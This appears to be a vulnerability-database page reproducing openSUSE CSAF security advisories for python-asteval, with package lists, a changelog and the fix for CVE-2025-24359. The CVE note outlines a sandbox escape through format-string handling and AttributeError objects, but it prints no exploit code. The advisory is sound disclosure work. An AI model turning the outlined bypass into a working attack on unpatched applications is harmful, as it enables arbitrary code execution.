        "product_reference": "python311-asteval-1.0.6-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.x86_64"
        },
        "product_reference": "python311-asteval-1.0.6-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-asteval-1.0.6-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.aarch64"
        },
        "product_reference": "python312-asteval-1.0.6-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-asteval-1.0.6-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.ppc64le"
        },
        "product_reference": "python312-asteval-1.0.6-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-asteval-1.0.6-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.s390x"
        },
        "product_reference": "python312-asteval-1.0.6-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-asteval-1.0.6-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.x86_64"
        },
        "product_reference": "python312-asteval-1.0.6-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-asteval-1.0.6-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.aarch64"
        },
        "product_reference": "python313-asteval-1.0.6-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-asteval-1.0.6-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.ppc64le"
        },
        "product_reference": "python313-asteval-1.0.6-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-asteval-1.0.6-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.s390x"
        },
        "product_reference": "python313-asteval-1.0.6-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-asteval-1.0.6-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.x86_64"
        },
        "product_reference": "python313-asteval-1.0.6-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-24359",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-24359"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.aarch64",
          "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.s390x",
          "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.x86_64",
          "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.aarch64",
          "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.s390x",
          "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.x86_64",
          "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.aarch64",
          "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.s390x",
          "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-24359",
          "url": "https://www.suse.com/security/cve/CVE-2025-24359"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1236405 for CVE-2025-24359",
          "url": "https://bugzilla.suse.com/1236405"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.aarch64",
            "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.s390x",
            "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.x86_64",
            "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.aarch64",
            "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.s390x",
            "openSUSE Tumbleweed:python312-asteval-1.0.6-1.1.x86_64",
            "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.aarch64",
            "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.s390x",
            "openSUSE Tumbleweed:python313-asteval-1.0.6-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-01-27T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-24359"
    }
  ]
}

OPENSUSE-SU-2025:0052-1

Vulnerability from csaf_opensuse - Published: 2025-02-03 19:01 - Updated: 2025-02-03 19:01

Summary

Security update for python-asteval

Notes

Title of the patch

Security update for python-asteval

Description of the patch

This update for python-asteval fixes the following issues: Update to 1.0.6: * drop testing and support for Python3.8, add Python 3.13, change document to reflect this. * implement safe_getattr and safe_format functions; fix bugs in UNSAFE_ATTRS and UNSAFE_ATTRS_DTYPES usage (boo#1236405, CVE-2025-24359) * make all procedure attributes private to curb access to AST nodes, which can be exploited * improvements to error messages, including use ast functions to construct better error messages * remove import of numpy.linalg, as documented * update doc description for security advisory Update to 1.0.5: * more work on handling errors, including fixing #133 and adding more comprehensive tests for #129 and #132 Update to 1.0.4: * fix error handling that might result in null exception Update to 1.0.3: * functions ('Procedures') defined within asteval have a ` _signature()` method, now use in repr * add support for deleting subscript * nested symbol tables now have a Group() function * update coverage config * cleanups of exception handling : errors must now have an exception * several related fixes to suppress repeated exceptions: see GH #132 and #129 * make non-boolean return values from comparison operators behave like Python - not immediately testing as bool - update to 1.0.2: * fix NameError handling in expression code * make exception messages more Python-like - update to 1.0.1: * security fixes, based on audit by Andrew Effenhauser, Ayman Hammad, and Daniel Crowley, IBM X-Force Security Research division * remove numpy modules polynomial, fft, linalg by default for security concerns * disallow string.format(), improve security of f-string evaluation - update to 1.0.0: * fix (again) nested list comprehension (Issues #127 and #126). * add more testing of multiple list comprehensions. * more complete support for Numpy 2, and removal of many Numpy symbols that have been long deprecated. * remove AST nodes deprecated in Python 3.8. * clean up build files and outdated tests. * fixes to codecov configuration. * update docs. - update to 0.9.33: * fixes for multiple list comprehensions (addressing #126) * add testing with optionally installed numpy_financial to CI * test existence of all numpy imports to better safeguard against missing functions (for safer numpy 2 transition) * update rendered doc to include PDF and zipped HTML - update to 0.9.32: * add deprecations message for numpy functions to be removed in numpy 2.0 * comparison operations use try/except for short-circuiting instead of checking for numpy arrays (addressing #123) * add Python 3.12 to testing * move repository from 'newville' to 'lmfit' organization * update doc theme, GitHub locations pointed to by docs, other doc tweaks. - Update to 0.9.31: * cleanup numpy imports to avoid deprecated functions, add financial functions from numpy_financial module, if installed. * prefer 'user_symbols' when initializing Interpreter, but still support 'usersyms' argument. Will deprecate and remove eventually. * add support of optional (off-by default) 'nested symbol table'. * update tests to run most tests with symbol tables of dict and nested group type. * general code and testing cleanup. * add config argument to Interpreter to more fully control which nodes are supported * add support for import and importfrom -- off by default * add support for with blocks * add support for f-strings * add support of set and dict comprehension * fix bug with 'int**int' not returning a float. - update to 0.9.29: * bug fixes - Update to 0.9.28 * add support for Python 3.11 * add support for multiple list comprehensions * improve performance of making the initial symbol table, and Interpreter creation, including better checking for index_tricks attributes - update to 0.9.27: * more cleanups - update to 0.9.26: * fix setup.py again - update to 0.9.25: * fixes import errors for Py3.6 and 3.7, setting version with importlib_metadata.version if available. * use setuptools_scm and importlib for version * treat all __dunder__ attributes of all objects as inherently unsafe. - Update to 0.9.22 * another important but small fix for Python 3.9 * Merge branch 'nested_interrupts_returns' - Drop hard numpy requirement, don't test on python36 - update to 0.9.18 * drop python2 * few fixes

Patchnames

openSUSE-2025-52

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Security update for python-asteval",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "This update for python-asteval fixes the following issues:\n\nUpdate to 1.0.6:\n\n  * drop testing and support for Python3.8, add Python 3.13,\n    change document to reflect this.\n  * implement safe_getattr and safe_format functions; fix bugs\n    in UNSAFE_ATTRS and UNSAFE_ATTRS_DTYPES usage (boo#1236405,\n    CVE-2025-24359)\n  * make all procedure attributes private to curb access to AST\n    nodes, which can be exploited\n  * improvements to error messages, including use ast functions\n    to construct better error messages\n  * remove import of numpy.linalg, as documented\n  * update doc description for security advisory\n\nUpdate to 1.0.5:\n\n  * more work on handling errors, including fixing #133 and\n    adding more comprehensive tests for #129 and #132\n\nUpdate to 1.0.4:\n\n  * fix error handling that might result in null exception\n\nUpdate to 1.0.3:\n\n  * functions (\u0027Procedures\u0027) defined within asteval have a `\n    _signature()` method, now use in repr\n  * add support for deleting subscript\n  * nested symbol tables now have a  Group() function\n  * update coverage config\n  * cleanups of exception handling :  errors must now have an\n    exception\n  * several related fixes to suppress repeated exceptions: see GH\n    #132 and #129\n  * make non-boolean return values from comparison operators\n    behave like Python - not immediately testing as bool\n\n- update to 1.0.2:\n  * fix NameError handling in expression code\n  * make exception messages more Python-like\n- update to 1.0.1:\n  * security fixes, based on audit by Andrew Effenhauser, Ayman\n    Hammad, and Daniel Crowley, IBM X-Force Security Research\n    division\n  * remove numpy modules polynomial, fft, linalg by default for\n    security concerns\n  * disallow string.format(), improve security of f-string\n    evaluation\n\n- update to 1.0.0:\n  * fix (again) nested list comprehension (Issues #127 and #126).\n  * add more testing of multiple list comprehensions.\n  * more complete support for Numpy 2, and removal of many Numpy\n    symbols that have been long deprecated.\n  * remove AST nodes deprecated in Python 3.8.\n  * clean up build files and outdated tests.\n  * fixes to codecov configuration.\n  * update docs.\n\n- update to 0.9.33:\n  * fixes for multiple list comprehensions (addressing #126)\n  * add testing with optionally installed numpy_financial to CI\n  * test existence of all numpy imports to better safeguard\n    against missing functions (for safer numpy 2 transition)\n  * update rendered doc to include PDF and zipped HTML\n\n- update to 0.9.32:\n  * add deprecations message for numpy functions to be removed in\n    numpy 2.0\n  * comparison operations use try/except for short-circuiting\n    instead of checking for numpy arrays (addressing #123)\n  * add Python 3.12 to testing\n  * move repository from \u0027newville\u0027 to \u0027lmfit\u0027 organization\n  * update doc theme, GitHub locations pointed to by docs, other\n    doc tweaks.\n\n- Update to 0.9.31:\n  * cleanup numpy imports to avoid deprecated functions, add financial\n  functions from numpy_financial module, if installed.\n  * prefer \u0027user_symbols\u0027 when initializing Interpreter, but still support\n  \u0027usersyms\u0027 argument. Will deprecate and remove eventually.\n  * add support of optional (off-by default) \u0027nested symbol table\u0027.\n  * update tests to run most tests with symbol tables of dict and nested\n  group type.\n  * general code and testing cleanup.\n  * add config argument to Interpreter to more fully control which nodes are supported\n  * add support for import and importfrom -- off by default\n  * add support for with blocks\n  * add support for f-strings\n  * add support of set and dict comprehension\n  * fix bug with \u0027int**int\u0027 not returning a float.\n\n- update to 0.9.29:\n  * bug fixes\n\n- Update to 0.9.28\n  * add support for Python 3.11\n  * add support for multiple list comprehensions\n  * improve performance of making the initial symbol table,\n    and Interpreter creation, including better checking for index_tricks attributes\n\n- update to 0.9.27:\n  * more cleanups\n\n- update to 0.9.26:\n  * fix setup.py again\n\n- update to 0.9.25:\n  * fixes import errors for Py3.6 and 3.7, setting version with\n    importlib_metadata.version if available.\n  * use setuptools_scm and importlib for version\n  * treat all __dunder__ attributes of all objects as inherently unsafe.\n\n- Update to 0.9.22\n  * another important but small fix for Python 3.9\n  * Merge branch \u0027nested_interrupts_returns\u0027\n- Drop hard numpy requirement, don\u0027t test on python36\n\n- update to 0.9.18\n  * drop python2\n  * few fixes\n",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-2025-52",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_0052-1.json"
      },
      {
        "category": "self",
        "summary": "URL for openSUSE-SU-2025:0052-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/S3ET4NHUOZVYKROXRFLTLBVGPX32M46Q/"
      },
      {
        "category": "self",
        "summary": "E-Mail link for openSUSE-SU-2025:0052-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/S3ET4NHUOZVYKROXRFLTLBVGPX32M46Q/"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1236405",
        "url": "https://bugzilla.suse.com/1236405"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-24359 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-24359/"
      }
    ],
    "title": "Security update for python-asteval",
    "tracking": {
      "current_release_date": "2025-02-03T19:01:08Z",
      "generator": {
        "date": "2025-02-03T19:01:08Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:0052-1",
      "initial_release_date": "2025-02-03T19:01:08Z",
      "revision_history": [
        {
          "date": "2025-02-03T19:01:08Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-asteval-1.0.6-bp156.4.3.1.noarch",
                "product": {
                  "name": "python311-asteval-1.0.6-bp156.4.3.1.noarch",
                  "product_id": "python311-asteval-1.0.6-bp156.4.3.1.noarch"
                }
              }
            ],
            "category": "architecture",
            "name": "noarch"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "SUSE Package Hub 15 SP6",
                "product": {
                  "name": "SUSE Package Hub 15 SP6",
                  "product_id": "SUSE Package Hub 15 SP6"
                }
              },
              {
                "category": "product_name",
                "name": "openSUSE Leap 15.6",
                "product": {
                  "name": "openSUSE Leap 15.6",
                  "product_id": "openSUSE Leap 15.6",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:leap:15.6"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-bp156.4.3.1.noarch as component of SUSE Package Hub 15 SP6",
          "product_id": "SUSE Package Hub 15 SP6:python311-asteval-1.0.6-bp156.4.3.1.noarch"
        },
        "product_reference": "python311-asteval-1.0.6-bp156.4.3.1.noarch",
        "relates_to_product_reference": "SUSE Package Hub 15 SP6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-bp156.4.3.1.noarch as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:python311-asteval-1.0.6-bp156.4.3.1.noarch"
        },
        "product_reference": "python311-asteval-1.0.6-bp156.4.3.1.noarch",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-24359",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-24359"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Package Hub 15 SP6:python311-asteval-1.0.6-bp156.4.3.1.noarch",
          "openSUSE Leap 15.6:python311-asteval-1.0.6-bp156.4.3.1.noarch"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-24359",
          "url": "https://www.suse.com/security/cve/CVE-2025-24359"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1236405 for CVE-2025-24359",
          "url": "https://bugzilla.suse.com/1236405"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Package Hub 15 SP6:python311-asteval-1.0.6-bp156.4.3.1.noarch",
            "openSUSE Leap 15.6:python311-asteval-1.0.6-bp156.4.3.1.noarch"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-02-03T19:01:08Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-24359"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-24359 (GCVE-0-2025-24359)

GHSA-3WWR-3G9F-9GC7

Summary

Details

PoC

FKIE_CVE-2025-24359

OPENSUSE-SU-2025:14701-1

OPENSUSE-SU-2025:0052-1

Tags

Sightings

Nomenclature